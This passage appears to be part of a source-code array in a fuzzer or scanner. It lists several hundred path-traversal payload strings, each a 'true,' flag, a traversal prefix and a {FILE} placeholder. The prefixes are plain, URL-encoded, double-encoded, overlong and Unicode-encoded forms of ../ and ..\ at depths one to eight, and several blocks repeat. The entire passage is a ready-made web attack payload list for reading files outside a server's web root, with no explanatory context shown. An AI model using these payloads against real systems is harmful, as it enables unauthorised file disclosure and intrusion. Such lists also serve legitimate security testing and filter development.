"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + "true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + 